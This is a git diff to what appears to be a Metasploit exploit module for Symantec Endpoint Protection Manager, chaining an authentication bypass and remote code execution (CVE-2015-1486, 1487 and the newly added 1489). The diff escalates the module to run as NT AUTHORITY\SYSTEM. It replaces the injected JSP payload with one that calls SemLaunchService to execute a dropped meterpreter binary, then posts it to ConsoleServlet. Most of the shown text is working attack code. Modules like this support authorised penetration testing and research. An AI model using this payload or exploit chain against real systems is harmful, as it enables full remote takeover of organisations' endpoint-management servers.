diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index d4016a267d..a66b8a9fa8 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => "Symantec Endpoint Protection Manager Auth Bypass and RCE", 'Description' => %q{ - This module exploits two separate vulnerabilities in Symantec Endpoint Protection Manager - in order to achieve a remote shell on the box. + This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager + in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM }, 'License' => MSF_LICENSE, 'Author' => @@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2015-1486'], ['CVE', '2015-1487'], + ['CVE', '2015-1489'], ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html'] ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, @@ -41,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], ], - 'Privileged' => false, + 'Privileged' => true, 'DisclosureDate' => 'Jul 31 2015', 'DefaultTarget' => 0)) @@ -73,7 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote cookie = res.get_cookies - exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>' + exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%> +<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> + } send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),